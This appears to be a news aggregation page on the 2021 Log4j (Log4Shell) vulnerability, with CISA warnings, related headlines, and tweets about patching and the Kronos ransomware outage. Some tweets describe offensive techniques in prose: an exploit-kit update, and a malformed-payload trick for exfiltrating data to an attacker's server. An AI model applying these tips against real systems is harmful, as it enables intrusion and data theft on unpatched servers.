CISA Director Jen Easterly says the Log4j flaw likely affects hundreds of millions of devices and may be the most serious bug she has seen in her career
Cybersecurity and Infrastructure Security Agency Director Jen Easterly told industry leaders in a phone briefing Monday that a vulnerability …
CyberScoop Tim Starks
Related Coverage
- The Log4J Vulnerability Will Haunt the Internet for Years Wired · Lily Hay Newman
- Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild Business Insights … · Martin Zugec
- Ten families of malicious samples are spreading using the Log4j2 vulnerability Now 360 · Ghost
- View article BleepingComputer
- US warns hundreds of millions of devices at risk from newly revealed software vulnerability CNN · Sean Lyngaas
- Ransomware, Trojans, DDoS Malware and Crypto-Miners Delivered in Log4Shell Attacks SecurityWeek · Eduard Kovacs
- Log4Shell Hell: anatomy of an exploit outbreak Sophos News · Sean Gallagher
- View article The Record
- Protect Yourself Against The Apache Log4j Vulnerability Check Point Software · Jacinta Paul
- View article Ars Technica
- View article WinBuzzer
- Log4j could be the most serious security threat ever seen, CISA head warns TechRadar
- CISA Director Says Log4j Flaw Affects Hundreds Of Millions Of Devices, May Be Most Serious Bug She Has Seen; + more news DSLreports
- Log4j flaw puts hundreds of millions of devices at risk, warns cybersecurity agency ZDNet · Liam Tung
- Software vulnerability expected to persist, possibly for months Livemint
- Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware The Hacker News · Ravie Lakshmanan
- BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-12 2204 UTC Gist · SwitHak
- Log4j may be the worst vulnerability yet, says Department of Homeland Security AppleInsider · Amber Neely
- Log4J vulnerability: Businesses must act to patch affected systems Tech Monitor · Claudia Glover
- Agencies Must Fix Newly Cataloged Vulnerabilities by Christmas Eve Nextgov
- An update on the Apache Log4j CVE-2021-44228 vulnerability IBM PSIRT · Ben Beetle
- View article Microsoft Security …
- Log4Shell Is Spawning Even Nastier Mutations Threatpost · Lisa Vaas
- Critical Log4Shell security flaw lets hackers compromise vulnerable servers TechRepublic · Lance Whitney
- Flaw prompts 100 hack attacks a minute, security company says BBC
- View article ProferoSec
- View article TechCircle
- View article BleepingComputer
- Log4j: List of vulnerable products and vendor advisories BleepingComputer · Ionut Ilascu
- Cyber experts express growing alarm over Apache vulnerability The Hill · Maggie Miller
- Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability The Cloudflare Blog · Jon Levine
- Google Ads Not Affected By Log4j 2 Vulnerability Search Engine Roundtable · Barry Schwartz
- Log4Shell vulnerability: What we know so far WeLiveSecurity · Rene Holt
- The Log4j vulnerability and its impact on software supply chain security Snyk
- Log4Shell in broad use: Fukushima moment for cybersecurity cybernews.com
- The Log4j software bug could put your favorite sites at risk: What you need to know CNET · Bree Fowler
- Hackers target 40% of corporate networks through Log4J flaw Financial Times · Hannah Murphy
- UKG expects weeks of downtime after ransomware attack The Record · Catalin Cimpanu
- A division of Virginia's General Assembly is dealing with ransomware attack Washington Post
- Christmas bonuses could be delayed after HR and payroll giant Kronos hit by ransomware attack TechRadar
- Kronos services knocked offline by ransomware attack cloudpro.co.uk · Connor Jones
- Ransomware strikes workflow solutions provider Kronos via suspected Log4shell exploit SiliconANGLE · Duncan Riley
- Kronos, major HR and payroll service provider, hit with ransomware, warns of a long outage cybernews.com · Vilius Petkauskas
- Payroll Service Kronos Offline After Ransomware Attack PYMNTS.com
- Timekeeping biz Kronos hit by ransomware and warns customers to engage biz continuity plans The Register · Gareth Corfield
- Christmas Payroll Fears After Ransomware Hits Software Provider infosecurity-magazine.com · Phil Muncaster
- Kronos Ransomware Outage Drives Widespread Payroll Chaos Threatpost · Tara Seals
- Ransomware attack takes down HR and payroll company software, potentially for several weeks USA Today · Michelle Shen
Discussion
-
@marcioalm
Márcio Almeida
on x
Just added support to LDAP Serialized Payloads in the JNDI-Exploit-Kit. This attack path works in *ANY* java version as long the classes used in the Serialized payload are in the application classpath. Do not rely on your java version being up-to-date and update your log4j ASAP! …
-
@tomanthonyseo
Tom Anthony
on x
Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target... https://twitter.com/...
-
@eastdakota
@eastdakota
on x
@Cloudflare We're seeing over 1,000 attempted exploits of the #Log4J vulnerability per second. Our WAF rules are protecting customers directly, but sanitizing logs helps ensure down-stream log processing isn't impacted. https://blog.cloudflare.com/ ...
-
@matthew_d_green
Matthew Green
on x
What percentage of Java software can't be patched because the companies that developed it have lost the source code?
-
@timstarks
Tim Starks
on x
CISA's recently concluded phone briefing with industry on the Log4j vulnerability sounded some pretty dire notes. Here's what Easterly et al told critical infrastructure folk. https://www.cyberscoop.com/...
-
@tonyajoriley
Tonya Riley
on x
.@timstarks got the inside scoop on CISA's call with industry leaders about #log4j today. CISA is expecting hundreds of millions of devices are likely to be affected. Cannot overstate the seriousness of this. https://www.cyberscoop.com/...
-
@chriseng
Chris Eng
on x
As we were starting to hear over the weekend, updating JVM version is no longer an effective mitigation. Continue focusing on patching the root cause! https://twitter.com/...
-
@matthew_d_green
Matthew Green
on x
Does anyone know how the log4j bug leaked out? Per @TaliaRinger was reported to the project on 12/6 and then was found in the wild a few days later. Coincidence? Leaked disclosure? Found in the wild?
-
@gossithedog
Kevin Beaumont
on x
For those who used Java versions as a mitigation (included some security vendors in their advisories): it isn't a mitigation. https://twitter.com/...
-
@bushidotoken
@bushidotoken
on x
The #Kinsing and #Muhstik cryptomining botnets are some of the first to exploit any new RCE vulnerability: this time it's Log4j & Log4Shell. Those two names have cropped up for several major RCEs this year, they've actually become one way to tell how bad a new RCE is.
-
@girlgerms
@girlgerms
on x
Some great information and guidance from Microsoft around Log4j: https://msrc-blog.microsoft.com/ ... https://www.microsoft.com/...
-
@p_malynin
Pavlo Malynin
on x
The #log4j exploit is so awesome I had to log onto my twitter for the first time in years. I have found the perfect weapon to fight iMessage and SMS scammers #Log4Shell https://twitter.com/...
-
@eastdakota
@eastdakota
on x
Earliest evidence we've found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don't see evidence of mass exploitation until after public disclosure.
-
@gossithedog
Kevin Beaumont
on x
This is another mitigation people are putting in - but it depends on a recent version of Log4j to work. There's a lot of placebo effect mitigations happening with Log4Shell, sadly. Even some vendors have issued motivations that don't actually work. https://twitter.com/...
-
@rover829
Vincent Lee
on x
Bloomberg: The first person to alert members of an open-source software project who frantically worked to fix a fatal flaw in a widely used software tool was a cloud-security team employee at Alibaba. https://twitter.com/...
-
@williamturton
William Turton
on x
“We promise to keep it secret until your official release version comes out. Please hurry up.” https://www.bloomberg.com/...
-
@soychicka
Random Facts Girl
on x
Who would ever think that a tool with such polished branding could be the weak link in the collapse of teh innerwebs? https://arstechnica.com/... https://twitter.com/...
-
@jamietarabay
Jamie Tarabay
on x
“In the frantic time since the flaw was publicly disclosed, researchers have concluded that the vulnerability had existed in #Log4j since September 2013, apparently unknown to its vast universe of users.” #Apache https://twitter.com/...
-
@seldo
Laurie Voss
on x
Turns out the entire world did not manage to patch every single Java application on earth over the weekend, so things are still on fire in Java land: https://www.bleepingcomputer.com/ ...
-
@_jfeldman
Jonathan Feldman
on x
Alright #kronos—buckle up y'all. It is indeed #ransomware. “we strongly recommend that you evaluate and implement alternative business continuity protocols” https://twitter.com/...
-
@campuscodi
Catalin Cimpanu
on x
Payroll and HR software maker UKG expects weeks of downtime after ransomware attack One of their customers told me today they are unable to process salaries ahead of the Xmas holiday, so very bad time to be down 🥶 https://therecord.media/... https://twitter.com/...
-
@uuallan
@uuallan
on x
This Kronos /Telestaff ransomware attack is having a wide ranging impact. I've received several complaints from several companies that can't process payroll this morning. https://twitter.com/...
-
@jasonlk
@jasonlk
on x
Woah -> “Kronos outage will last several >weeks<. Firm advises customers to use other services.” https://twitter.com/...
-
@ldignan
Larry Dignan
on x
This is such as bad look for a vendor that keeps time and processes payroll. Kronos hit with ransomware, warns of data breach and ‘several week’ outage https://www.zdnet.com/... via @ZDNet & @jgreigj https://www.techmeme.com/... and community link. https://community.kronos.com/ .…